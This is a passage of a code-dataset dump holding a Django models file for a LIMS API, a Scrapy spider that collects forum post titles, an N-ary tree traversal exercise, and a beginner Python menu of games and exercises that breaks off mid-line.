six.PY3:\n return uni_dict\n\n data = {}\n\n for key, value in uni_dict.items():\n data[smart_bytes(key)] = value\n\n return data\n\n\nclass LogDiff(models.Model):\n \n # reference to the parent ApiLog\n log = models.ForeignKey('ApiLog', on_delete=models.CASCADE)\n \n #field = models.ForeignKey('Metahash')\n field_key = models.TextField()\n field_scope = models.TextField()\n \n before = models.TextField(null=True)\n after = models.TextField(null=True)\n \n class Meta:\n unique_together = (('log','field_key','field_scope')) \n\n def __repr__(self):\n return (\n \"\" \n % (self.log.ref_resource_name, self.log.key, self.field_key))\n\nclass ApiLog(models.Model):\n \n objects = models.Manager()\n \n # FIXME: change to foreign key\n user_id = models.IntegerField(null=False)\n username = models.CharField(null=False, max_length=128)\n\n # Name of the resource, i.e. 
\"apilog\" or \"screen\", \"user\", etc.\n ref_resource_name = models.CharField(\n null=False, max_length=128, db_index=True)\n\n # Full public key of the resource instance being logged (may be composite, \n # separated by '/')\n key = models.CharField(null=False, max_length=128, db_index=True)\n \n # Full uri of the resource instance being logged, \n # a combination of [base api uri]/[resource_name]/[key]\n uri = models.TextField(null=False)\n \n # Date and time of the update; this is the key for the apilog record\n date_time = models.DateTimeField(null=False)\n \n api_action = models.CharField(\n max_length=10, null=False, \n choices=zip(\n API_ACTION.get_ordered_dict().keys(),\n API_ACTION.get_ordered_dict().values(),\n )\n )\n \n comment = models.TextField(null=True)\n \n parent_log = models.ForeignKey(\n 'self', related_name='child_logs', null=True, on_delete=models.CASCADE)\n \n # json_field stores meta information\n json_field = models.TextField(null=True)\n \n is_preview = models.BooleanField(default=False)\n \n class Meta:\n unique_together = (('ref_resource_name', 'key', 'date_time')) \n\n def __init__(self, *args, **kwargs):\n self.diffs = {}\n models.Model.__init__(self, *args, **kwargs)\n \n def __repr__(self):\n return (\n ''\n % (self.id, self.api_action, self.ref_resource_name, self.key,\n self.uri, strftime_log(self.date_time), self.user_id, \n self.username))\n\n @property\n def log_uri(self):\n ''' Return the URI of the ApiLog\n '''\n \n return '/'.join([\n self.ref_resource_name,self.key, strftime_log(self.date_time)])\n \n @staticmethod \n def json_dumps(obj):\n \n obj_as_dict = { k:v for k,v in vars(obj).items() if k[0] != '_'}\n diffs = defaultdict(list)\n for dl in obj.logdiff_set.all():\n diffs[dl.field_key] = [dl.before,dl.after]\n obj_as_dict['diffs'] = dict(diffs)\n return json.dumps(obj_as_dict, cls=LimsJSONEncoder)\n \n @staticmethod\n def _encode_before_after(val):\n '''\n Encode LogDiff.before and after values:\n All diff values are stored as strings unless they represent list values:\n - in this case the JSON representation of the list is stored. 
\n '''\n if val is None:\n return val\n if isinstance(val, (list,tuple)):\n val = json.dumps(val, cls=LimsJSONEncoder)\n elif not isinstance(val, six.string_types):\n val = str(val)\n return val\n \n def save(self, **kwargs):\n ''' \n Override to store/encode the diffs:\n - before/after are stored as the string representation of the field \n value.\n - if the field value is a list, store the JSON representation.\n '''\n \n is_new = self.pk is None\n \n logger.debug('encode json field: log: %r', self.json_field)\n if self.json_field:\n if isinstance(self.json_field, dict):\n try:\n self.json_field = json.dumps(self.json_field, cls=LimsJSONEncoder)\n except Exception:\n logger.exception('error with json_field value encoding: %r', \n self.json_field)\n models.Model.save(self, **kwargs)\n \n if is_new:\n logger.debug('logging new diffs: %r', self.diffs)\n bulk_create_diffs = []\n for key,diffs in self.diffs.items():\n assert isinstance(diffs, (list,tuple))\n assert len(diffs) == 2\n before = self._encode_before_after(diffs[0])\n after = self._encode_before_after(diffs[1])\n bulk_create_diffs.append(LogDiff(\n log=self,\n field_key = key,\n field_scope = 'fields.%s' % self.ref_resource_name,\n before=before,\n after=after))\n LogDiff.objects.bulk_create(bulk_create_diffs)\n else:\n logger.debug('logging update diffs: %r', self.diffs)\n # Note: this option should not be used for bulk creation\n for key,diffs in self.diffs.items():\n assert isinstance(diffs, (list,tuple))\n assert len(diffs) == 2\n before = self._encode_before_after(diffs[0])\n after = self._encode_before_after(diffs[1])\n found = False\n for logdiff in self.logdiff_set.all():\n if logdiff.field_key == key:\n logdiff.before=before\n logdiff.after=after\n logdiff.save()\n found = True\n if not found:\n LogDiff.objects.create(\n log=self,\n field_key = key,\n field_scope = 'fields.%s' % self.ref_resource_name,\n before=before,\n after=after)\n \n @staticmethod\n def bulk_create(logs):\n '''\n Utility method - bulk create/save ApiLog instances\n '''\n\n logger.debug('bulk create logs: %r', logs)\n with transaction.atomic():\n with get_engine().connect() as conn:\n last_id = int(\n conn.execute(\n 'select last_value from reports_apilog_id_seq;')\n .scalar() or 0)\n \n for log in logs:\n if log.json_field:\n if isinstance(log.json_field, dict):\n try:\n log.json_field = json.dumps(log.json_field, cls=LimsJSONEncoder)\n except Exception:\n logger.exception('error with json_field value encoding: %r', \n log.json_field)\n \n ApiLog.objects.bulk_create(logs)\n #NOTE: Before postgresql & django 1.10 only: \n # ids must be manually created on bulk create\n for i,log in enumerate(logs):\n log.id = last_id+i+1\n \n bulk_create_diffs = []\n for i,log in enumerate(logs):\n for key, logdiffs in log.diffs.items():\n bulk_create_diffs.append(\n LogDiff(\n log=log,\n field_key = key,\n field_scope = 'fields.%s' % log.ref_resource_name,\n before=ApiLog._encode_before_after(logdiffs[0]),\n after=ApiLog._encode_before_after(logdiffs[1]))\n )\n LogDiff.objects.bulk_create(bulk_create_diffs)\n \n return logs\n\n\nclass MetaManager(models.Manager):\n ''' Manager for the MetaHash table '''\n\n def __init__(self, **kwargs):\n super(MetaManager,self).__init__(**kwargs)\n\n def get_or_none(self, function=None, **kwargs):\n try:\n x = self.get(**kwargs)\n if x and function:\n return function(x)\n else:\n return x\n except self.model.DoesNotExist: \n return None\n\n def get_and_parse(self, scope='', field_definition_scope='fields.field', \n clear=False):\n '''\n Parse 
fields from the Metadata store using definitions specified by the\n \"field_definition_scope\" (cached version).\n\n @param scope defines the target resource to return fields for:\n e.g. \"fields.screensaveruser\", or \"fields.screen\"\n \n @param field_definition_scope defines the schema of the field objects \n that will be parsed:\n e.g. \"fields.field\", or \"fields.resource, or fields.vocabulary\"\n @param clear to clear the cache\n\n '''\n metahash = {}\n if not clear:\n metahash = cache.get('metahash:%s'%scope)\n else:\n cache.delete('metahash:%s'%scope)\n \n if not metahash:\n metahash = self._get_and_parse(\n scope=scope, field_definition_scope=field_definition_scope)\n cache.set('metahash:'+scope, metahash);\n logger.debug(\n 'get_and_parse done, for %r, hash found: %r', \n scope, metahash.keys())\n else:\n logger.debug('retrieve the cached field definitions for %r',scope)\n return metahash\n\n\n def _get_and_parse(self, scope='', \n field_definition_scope='fields.field'):\n '''\n Parse fields from the Metadata store using definitions specified by the\n \"field_definition_scope\" (non-cached version).\n '''\n logger.debug(\n 'get_and_parse table field definitions for scope: %r, fds: %r',\n scope, field_definition_scope)\n \n # Parse field schema definition first\n field_definition_table = MetaHash.objects.all().filter(\n scope=field_definition_scope)\n if not field_definition_table:\n # Bootstrap case\n logger.warn('field definitions not found for: %r',\n field_definition_scope)\n return {}\n logger.debug('field_definition_table: %r', \n [field.key for field in field_definition_table])\n \n # Use the field schema definition to parse the row objects:\n # Row objects themselves are stored in the metahash table as well.\n unparsed_objects = \\\n MetaHash.objects.all().filter(scope=scope).order_by('ordinal')\n logger.debug('unparsed_objects: %r', \n [field.key for field in unparsed_objects])\n \n parsed_objects = OrderedDict()\n for unparsed_object in unparsed_objects:\n\n parsed_object = {}\n \n for field_key in [x.key for x in field_definition_table]:\n parsed_object[field_key] = unparsed_object.get_field(field_key)\n \n # NOTE: choices for the \"vocabulary_scope_ref\" are being stored \n # here for convenience\n # TODO: restrict choices to retired != True\n if parsed_object.get(u'vocabulary_scope_ref'):\n vocab_ref = parsed_object['vocabulary_scope_ref']\n parsed_object['choices'] = [\n x.key for x in Vocabulary.objects.all().filter(\n scope=vocab_ref)]\n \n parsed_objects[unparsed_object.key] = \\\n dict_strip_unicode_keys(parsed_object)\n\n return parsed_objects\n\n\nclass MetaHash(models.Model):\n '''\n Store API metadata for resources and fields.\n \n Uses a composite key consisting of (scope, key).\n\n Additional data are defined as JSON in the json_field and are parsed \n using the schema defined via the \"field\" resource.\n '''\n \n objects = MetaManager()\n \n scope = models.CharField(max_length=64)\n key = models.CharField(max_length=64)\n alias = models.CharField(max_length=64)\n ordinal = models.IntegerField();\n\n # Required if the record represents a JSON field; \n # choices are from the TastyPie field types\n json_field_type = models.CharField(max_length=128, null=True); \n \n json_field = models.TextField(null=True) \n\n # Required if the record represents a linked field; \n # choices are from the TastyPie field types.\n # 20181214 - deprecate, used for Reagent resource subtypes.\n linked_field_type = models.CharField(\n max_length=128, null=True); \n \n 
loaded_field = None\n \n class Meta:\n unique_together = (('scope', 'key')) \n \n def get_json_field_hash(self):\n ''' Load the json field.'''\n if self.json_field:\n if not self.loaded_field: \n self.loaded_field = json.loads(self.json_field)\n return self.loaded_field\n else:\n return {}\n \n def get_field(self, field):\n '''Retrieve a field value, parsing it from the json_field if needed.'''\n field_names = set([\n f.name for f in self._meta.get_fields()])\n if field in field_names:\n return getattr(self,field)\n temp = self.get_json_field_hash()\n if field in temp:\n return temp[field]\n else:\n logger.debug('unknown field: %s',field)\n return None\n \n def set_json_field(self, field, value):\n '''Set a value to a field, stored internally in the json_field.'''\n \n temp = self.get_json_field_hash()\n temp[field] = value;\n self.json_field = json.dumps(temp, cls=LimsJSONEncoder)\n \n def is_json(self):\n '''True if the current metadata represents a JSON nested field'''\n return True if self.json_field_type else False\n \n def model_to_dict(self, scope):\n '''\n Specialized model_to_dict that will parse data from the internal\n json_field.\n \n @param scope for finding field definitions in the metahash table.\n e.g. \"fields.\" \n '''\n fields = MetaHash.objects.get_and_parse(scope=scope)\n dict = {}\n for key in fields.keys():\n dict[key] = self.get_field(key)\n return dict\n \n def __repr__(self):\n return (\n ''\n % (self.id, self.scope, self.key))\n\nclass Vocabulary(models.Model):\n '''Store vocabularies for the API'''\n \n objects = MetaManager()\n \n scope = models.CharField(max_length=128)\n key = models.CharField(max_length=128)\n alias = models.CharField(max_length=64)\n ordinal = models.IntegerField();\n title = models.CharField(max_length=512)\n is_retired = models.NullBooleanField()\n comment = models.TextField(null=True)\n description = models.TextField(null=True)\n \n # Other data may be stored in the json_field; field metadata for \n # the vocabulary resource may be used to define these fields.\n json_field = models.TextField(null=True)\n \n class Meta:\n unique_together = (('scope', 'key')) \n \n def get_json_field_hash(self):\n if self.json_field:\n return json.loads(self.json_field)\n else:\n return {}\n \n def get_field(self, field):\n temp = self.get_json_field_hash()\n if(field in temp):\n return temp[field]\n else:\n # Note, json_field is sparse, not padded with empty attributes\n logger.debug('%r, field not found: %r',self, field) \n return None\n \n def set_json_field(self, field, value):\n temp = self.get_json_field_hash()\n temp[field] = value;\n self.json_field = json.dumps(temp, cls=LimsJSONEncoder)\n \n def __repr__(self):\n return (\n ''\n % (self.scope, self.key, self.ordinal))\n\n \nclass Permission(models.Model):\n '''\n Permissions for API resources and fields:\n\n - scope of the resource or field,\n - key of the resource or field,\n - type, e.g. 
\"read\" or \"write\".\n '''\n\n scope = models.CharField(max_length=64) # scope of the permission\n key = models.CharField(max_length=64) # key of the permission\n type = models.CharField(max_length=35)\n \n class Meta:\n unique_together = (('scope', 'key', 'type')) \n \n def __repr__(self):\n return (\n ''\n % (self.scope, self.key, self.type))\n \n \nclass UserGroup(models.Model):\n '''\n Define UserGroups that will have permissions:\n - UserGroups contain users,\n - UserGroups may belong to other UserGroups through the super_groups,\n - A UserGroup inherits the super_group permissions,\n - A super_group inherits the UserGroup's users.\n '''\n \n name = models.TextField(unique=True)\n title = models.TextField(unique=True, null=True)\n users = models.ManyToManyField('reports.UserProfile')\n permissions = models.ManyToManyField('reports.Permission')\n description = models.TextField(null=True)\n \n # Super Groups: \n # - inherit permissions from super_groups, this group is a sub_group to them\n # - inherit users from sub_groups, this group is a super_group to them\n # NOTE: Creates an \"adjacency-tree\" here; this can be non-performant\n # for large trees - which is not expected here; and it also requires use\n # of postgres-specific \"array\" types and operators \n # (see reports.api.UserGroupResource).\n # The trade-off here is in simplicity of maintenance.\n # see \"SQL antipatterns\" for more discussion.\n super_groups = models.ManyToManyField('self', symmetrical=False, \n related_name='sub_groups')\n\n def get_all_permissions(self, sub_groups=None, **kwargs):\n ''' \n get permissions of this group, and any inherited through super_groups\n @param kwargs to filter permissions by attributes\n '''\n if not sub_groups: \n sub_groups = set()\n sub_groups.add(self) # TODO: test recursion check\n # start with this groups permissions\n permissions = set(self.permissions.filter(**kwargs));\n \n for group in self.super_groups.all():\n if group not in sub_groups:\n permissions.update(group.get_all_permissions(\n sub_groups=sub_groups, **kwargs))\n \n return list(permissions)\n \n def get_all_users(self, super_groups=None, **kwargs):\n '''\n get users of this group, and any from sub_groups as well\n @param kwargs to filter users by attributes\n '''\n if not super_groups:\n super_groups = set()\n super_groups.add(self)\n # start with this groups users\n users = set(self.users.filter(**kwargs));\n \n for group in self.sub_groups.all():\n if group not in super_groups:\n users.update(group.get_all_users(\n super_groups=super_groups, **kwargs))\n \n return list(users)\n \n def __repr__(self):\n return (\n ''\n % (self.name))\n\nclass UserProfile(models.Model):\n ''' Extend the Django auth.User for the reports API.'''\n\n objects = MetaManager()\n \n # Link to django.contrib.auth.models.User, note: allow null so that it\n # can be created at the same time, but not null in practice\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE) \n \n # Note: username mirrors the auth_user.username field\n username = models.TextField(null=False, unique=True) \n \n # Reports API specific fields\n phone = models.TextField(null=True)\n mailing_address = models.TextField(null=True)\n comments = models.TextField(null=True)\n\n ecommons_id = models.TextField(null=True)\n\n # Note: fields also found on ScreensaverUser\n harvard_id = models.TextField(null=True)\n harvard_id_expiration_date = models.DateField(null=True)\n harvard_id_requested_expiration_date = 
models.DateField(null=True)\n \n created_by_username = models.TextField(null=True)\n\n gender = models.CharField(null=True, max_length=15) \n\n # These permissions assigned directly to the user, as opposed to by group\n permissions = models.ManyToManyField('reports.Permission')\n\n def __repr__(self):\n return (\n ''\n % (self.username, self.id, self.user.id))\n \n def get_all_groups(self):\n\n groups = set()\n for group in self.usergroup_set.all():\n groups.add(group)\n for supergroup in group.super_groups.all():\n if supergroup in groups:\n continue\n groups.add(supergroup)\n \n return groups\n \n @property\n def email(self):\n return self.user.email \n \n @property \n def first_name(self):\n \"Returns the person's full name.\"\n return self.user.first_name\n @property\n def last_name(self):\n \"Returns the person's full name.\"\n return self.user.last_name\n \n\nclass Job(models.Model):\n '''Manage API background job data'''\n\n user_requesting = models.ForeignKey(\n 'UserProfile', on_delete=models.PROTECT)\n \n # Unique URI for the resource action being serviced\n uri = models.TextField()\n method = models.TextField()\n encoding = models.TextField()\n content_type = models.TextField()\n http_accept = models.TextField()\n # JSON encoded request params\n params = models.TextField()\n \n # user comment on post\n comment = models.TextField(null=True);\n # Extra posted context data (filenames, etc.); JSON encoded\n context_data = models.TextField(null=True)\n \n # Assigned when the job is running\n process_id = models.TextField(null=True)\n # Extra runtime information, json encoded\n process_env = models.TextField(null=True)\n process_messages = models.TextField(null=True)\n \n state = models.TextField(\n default=SCHEMA.VOCAB.job.state.PENDING, \n choices=zip(\n SCHEMA.VOCAB.job.state.get_ordered_dict().keys(),\n SCHEMA.VOCAB.job.state.get_ordered_dict().values(),\n ))\n date_time_requested = models.DateTimeField(null=False, default=timezone.now) \n date_time_submitted = models.DateTimeField(null=True) \n date_time_processing = models.DateTimeField(null=True) \n date_time_completed = models.DateTimeField(null=True) \n \n response_status_code = models.IntegerField(null=True)\n #JSON encoded response content\n response_content = models.TextField(null=True)\n \n def __repr__(self):\n return (\n ''\n % (self.id, self.user_requesting.id))\n \n","sub_path":"reports/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":24525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"640330914","text":"import scrapy\n\nclass ScrapingSpider(scrapy.Spider):\n name = 'subject'\n start_urls = [\n 'https://gall.dcinside.com/mgallery/board/lists/?id=entj'\n ]\n\n def parse(self, response):\n for a in response.css('tr.ub-content'):\n href = a.css('a.reply_numbox::attr(href)').extract_first()\n text = a.css('a::text').extract_first()\n href2 = response.urljoin(href)\n yield{\n 'text': text,\n 'url': href2\n }\n# testing successful!\n# this file extracts 게시물 제목 and URL\n# based on quotes_spider.py\n","sub_path":"wiki/wiki/spiders/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"337866912","text":"from collections import deque\nclass Node(object):\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = []\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: Node\n 
:rtype: List[List[int]]\n \"\"\"\n if root is None:\n return []\n result = []\n queue =deque([root])\n while queue:\n level = []\n for _ in range(len(queue)):\n root = queue.popleft()\n level.append(root.val)\n queue.extend(root.children)\n result.append(level)\n return result\nn6=Node(6)\nn5=Node(5)\nn4=Node(4)\nn3=Node(2)\nn2=Node(3)\nn1=Node(1)\nn1.children=[n2,n3,n4]\nn2.children=[n5,n6]\ns=Solution()\nresult=s.levelOrder(n1)\nprint(result)","sub_path":"Week2/N叉树的层序遍历.py","file_name":"N叉树的层序遍历.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"70253559","text":"while True:\r\n\r\n print('Your options are divisors, even or odd, \\\r\nrock paper scissors, betting game, reverse word order, \\\r\npalindrome, even numbers, guessing game\\\r\n, even numbers, list end, fibonnaci, list duplicates, \\\r\npassword, cow and bull, list overlap and probably others')\r\n what = input('Which program do you want to run?: ')\r\n if what == 'divisors':\r\n x = int(input('Enter a number: '))\r\n y = list(range(1,x+1))\r\n z = []\r\n for i in y:\r\n y = x % i\r\n if y == 0:\r\n z.append(i)\r\n print(z)\r\n elif what == 'even or odd':\r\n run = 1\r\n while run == 1:\r\n number = input('Please enter a number: ')\r\n while number != 'end':\r\n number = int(number)\r\n number = number % 2\r\n if number == 1:\r\n print('You entered an odd number, try to fool me again')\r\n break\r\n if number == 0:\r\n print('Too easy, that was an even number')\r\n break\r\n if number == 'end':\r\n print('Ending program')\r\n run = run + 1\r\n elif what == 'rock paper scissors':\r\n points=0\r\n\r\n import random\r\n\r\n print('You will start with 0 points.')\r\n\r\n print('You will fight the computer by way of rock, paper, scissors.')\r\n\r\n print('The first of you to reach 2 points shall be awarded with continuing life. Good luck.')\r\n\r\n print('The score goes up when you win and down when you lose. Do not fail')\r\n\r\n print('The computer will attempt to reach -2 while you will try to get to 2')\r\n\r\n x = ['rock','paper','scissors']\r\n\r\n while -2 < points < 2:\r\n print('Player, what is your weapon of choice?')\r\n answer=input('rock, paper, or scissors: ')\r\n print()\r\n random.choice(x)\r\n computer = random.choice(x)\r\n\r\n if answer == 'rock':\r\n\r\n if computer == 'scissors':\r\n print('Computer used scissors')\r\n print('Wow, great job. Were so proud of you.')\r\n points=points+1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'rock':\r\n print('Computer used rock')\r\n print('Wow, good job, you tied. Hesitant applause.')\r\n points=str(points)\r\n print('The score is still',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'paper':\r\n print('Computer used paper')\r\n print('Wow, you lost. Try harder.')\r\n points=points-1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif answer == 'paper':\r\n\r\n if computer == 'scissors':\r\n print('Computer used scissors')\r\n print('Wow, you lost. Try harder.')\r\n points=points-1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'rock':\r\n print('Computer used rock')\r\n print('Wow, great job. 
Were so proud of you.')\r\n points=points+1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'paper':\r\n print('Computer used paper')\r\n print('Wow, good job, you tied. Hesitant applause.')\r\n points=str(points)\r\n print('The score is still',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif answer == 'scissors':\r\n\r\n if computer == 'scissors':\r\n print('Computer used scissors')\r\n print('Wow, good job, you tied.')\r\n points=str(points)\r\n print('The score is still',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'rock':\r\n print('Computer used rock')\r\n print('Wow, you lost. Try harder.')\r\n points=points-1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'paper':\r\n print('Computer used paper')\r\n print('Wow, great job. Were so proud of you.')\r\n points=points+1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n if points >= 2:\r\n\r\n print('Congratulations, you won against a computer. Feeling particularly proud?')\r\n\r\n elif points <= -2:\r\n\r\n print('Wow, you just got beaten by rng. Well done!')\r\n\r\n elif what == 'betting game':\r\n import random\r\n print('Your balance is 1000')\r\n\r\n balance = 1000\r\n\r\n while 0 < balance < 5000:\r\n print('How much do you wish to bet?')\r\n bet = input()\r\n bet = int(bet)\r\n number = random.randint(1,2)\r\n if bet > balance:\r\n print('Stupid human, you dont have that much money')\r\n print('Try again')\r\n\r\n if bet <= balance:\r\n bet = str(bet)\r\n print('We will flip a coin to determine the outcome.','Your bet is '+bet+'')\r\n\r\n print('The coin has landed')\r\n print('What is your guess')\r\n guess = input()\r\n guess = int(guess)\r\n\r\n print(number)\r\n\r\n\r\n if guess < number:\r\n print('You guessed too low. You lose '+bet+'')\r\n\r\n balance = int(balance)\r\n bet = int(bet)\r\n balance = balance-bet\r\n\r\n if guess > number:\r\n print('You guessed too high. You lose '+bet+'')\r\n\r\n balance = int(balance)\r\n bet = int(bet)\r\n balance = balance-bet\r\n\r\n if guess == number:\r\n print('Well Done!')\r\n\r\n balance = int(balance)\r\n bet = int(bet)\r\n balance = balance+3*bet\r\n\r\n balance = str(balance)\r\n bet = str(bet)\r\n print('Your new balance is '+balance+'')\r\n\r\n balance = int(balance)\r\n if balance >= 5000:\r\n print('Good job. 
You have acquired the skill-gambling addiction-.')\r\n\r\n\r\n elif what == 'list overlap':\r\n import random\r\n x = random.sample(range(5),3)\r\n y = random.sample(range(5),3)\r\n print(x)\r\n print(y)\r\n z = [e for e in x if e in y]\r\n print(z)\r\n\r\n elif what == 'palindrome':\r\n word = input('Type a word or sentence to see if it\\'s a palindrome: ')\r\n word = word.replace(' ','')\r\n w = word[::-1]\r\n if w == word:\r\n print('Yes, that\\'s a palindrome.')\r\n elif w != word:\r\n print('No, that\\'s not a palindrome.')\r\n\r\n elif what == 'even numbers':\r\n import random\r\n num = random.sample(range(100),10)\r\n print(num)\r\n num = [i for i in num if i % 2 ==0]\r\n print(num)\r\n\r\n elif what == 'guessing game':\r\n import random\r\n num = random.randint(1,9)\r\n print('Type exit to exit')\r\n guess = input('Guess the number, it is between 1 and 9: ')\r\n if guess == 'exit':\r\n break\r\n guess = int(guess)\r\n while guess != num:\r\n if guess > num:\r\n print('You guessed too high, try again')\r\n elif guess < num:\r\n print('You guessed too low, try again')\r\n guess = int(input('Guess the number, it is between 1 and 9: '))\r\n if guess == num:\r\n print('Wow, fantastic job *slow clapping*')\r\n\r\n elif what == 'prime':\r\n def prime(a,b):\r\n z = []\r\n for i in range(a,b):\r\n x = list(range(2,i+1))\r\n x = [e for e in x if i % e == 0 or e == i]\r\n x = [e for e in x if len(x) == 1]\r\n for e in x:\r\n z.append(e)\r\n print(z)\r\n beg = int(input('Pick the beginning number in your range: '))\r\n end = int(input('Pick the ending number in your range: '))\r\n y = prime(beg,end)\r\n\r\n elif what == 'list end':\r\n import random\r\n x = list(random.sample(range(1,101),5))\r\n x.sort()\r\n print(x)\r\n z = [x[0], x[len(x)-1]]\r\n print(z)\r\n\r\n elif what == 'fibonnaci':\r\n a = [1,1]\r\n b = int(input('How many numbers from the sequence do you want?: '))\r\n def fib():\r\n z = a[len(a)-2] + a[len(a)-1]\r\n a.append(z)\r\n while len(a) < b:\r\n fibonnaci = fib()\r\n print(a)\r\n\r\n elif what == 'list duplicates':\r\n import random\r\n def a():\r\n z = []\r\n while len(z) <= 10:\r\n x = random.randint(1,11)\r\n z.append(x)\r\n print(z)\r\n return z\r\n def b():\r\n return set(a())\r\n print(b())\r\n elif what == 'reverse word order':\r\n def reverse():\r\n x = input('Type a sentence that will be returned in reverse order: ')\r\n x = x.split()\r\n x = x[::-1]\r\n x = ' '.join(x)\r\n return x\r\n print(reverse())\r\n\r\n elif what == 'password':\r\n while True:\r\n a = input('How strong of a password? 
strong, medium, weak: ')\r\n x = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0'\r\n ,'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\r\n '%','@','#','$','!','^','&','*']\r\n import random\r\n if a == 'strong':\r\n y = random.sample(x,10)\r\n y = ''.join(y)\r\n print(y)\r\n elif a == 'medium':\r\n y = random.sample(x,5)\r\n y = ''.join(y)\r\n print(y)\r\n elif a == 'weak':\r\n y = random.sample(x,3)\r\n y = ''.join(y)\r\n print(y)\r\n elif a == 'end':\r\n break\r\n elif what == 'cow and bull':\r\n import random\r\n list1 = ['1','2','3','4','5','6','7','8','9','0']\r\n x = random.sample(list1,4)\r\n y = list(str(input('Enter a 4-digit number: ')))\r\n guess = 1\r\n def cow():\r\n z = [i for i in x if i in y and y.index(i) == x.index(i)]\r\n return len(z)\r\n def bull():\r\n a = [i for i in x if i in y and y.index(i) != x.index(i)]\r\n return len(a)\r\n if __name__ == '__main__':\r\n while cow() < 4:\r\n print('You have', cow(),'cows and', bull(),'bulls')\r\n y = list(str(input('Enter a 4-digit number: ')))\r\n guess += 1\r\n list2 = ''.join(y)\r\n if list2 == 'end':\r\n print('Ending program')\r\n break\r\n if cow() == 4:\r\n print('Congratulations, you guessed the number!')\r\n print('It only took you', guess,'guesses!')\r\n break\r\n elif what == 'tic':\r\n def wid(x,y):\r\n z = 0\r\n while z < y:\r\n print(str(' ---') * x)\r\n print(str('| ') * (x + 1))\r\n z += 1\r\n def height(y):\r\n x = int(input('Enter the width of the grid: '))\r\n wid(x,y)\r\n print(str(' ---') * x)\r\n\r\n height(int(input('Enter the height of the grid: ')))\r\n\r\n elif what == 'tac':\r\n game = [[0,0,0],\r\n [0,0,0],\r\n [0,0,0]]\r\n\r\n gameX = [[' ',' ',' '],\r\n [' ',' ',' '],\r\n [' ',' ',' ']]\r\n\r\n def board(x):\r\n print(str(' ---') * 3)\r\n print('|', x[0][0], '|', x[0][1], '|', x[0][2], '|')\r\n print(str(' ---') * 3)\r\n print('|', x[1][0], '|', x[1][1], '|', x[1][2], '|')\r\n print(str(' ---') * 3)\r\n print('|', x[2][0], '|', x[2][1], '|', x[2][2], '|')\r\n print(str(' ---') * 3)\r\n\r\n board(gameX)\r\n\r\n def column(x):\r\n a = [x[0][i] for i in range(0,3) if x[0][i] == x[1][i] and x[0][i] == x[2][i]\\\r\n and x[0][i] != 0]\r\n return a\r\n def row(x):\r\n b = [x[i][0] for i in range(0,3) if x[i][0] == x[i][1] and x[i][0] == x[i][2]\\\r\n and x[i][0] != 0]\r\n return b\r\n def diagonal(x):\r\n c = [x[0][i] for i in [0,2] if x[0][i] == x[1][1] and x[0][i] == x[2][::-1][i]\\\r\n and x[0][i] != 0]\r\n return c\r\n\r\n def win(x):\r\n if 1 in column(game) or 1 in row(game) or 1 in diagonal(game)\\\r\n or 2 in column(game) or 2 in row(game) or 2 in diagonal(game):\r\n return 1\r\n else:\r\n return 2\r\n\r\n moves = 0\r\n\r\n player1 = 0\r\n player2 = 0\r\n\r\n while moves < 9:\r\n if __name__ == '__main__':\r\n while True:\r\n playerX = input('Player 1 enter the coordinate in the form row, column: ')\r\n playerX = playerX.split(',')\r\n\r\n if game[int(playerX[0])-1][int(playerX[1])-1] == 0:\r\n game[int(playerX[0])-1][int(playerX[1])-1] = 1\r\n gameX[int(playerX[0])-1][int(playerX[1])-1] = 'X'\r\n board(gameX)\r\n moves += 1\r\n break\r\n else:\r\n print('That move is already taken')\r\n\r\n if 1 in column(game) or 1 in row(game) or 1 in diagonal(game):\r\n print('Player 1 wins!')\r\n play = input('Do you want to play again?: ')\r\n\r\n if play == 'yes':\r\n moves = 0\r\n player1 += 1\r\n print('Player 1 has', player1, 'wins')\r\n print('Player 2 
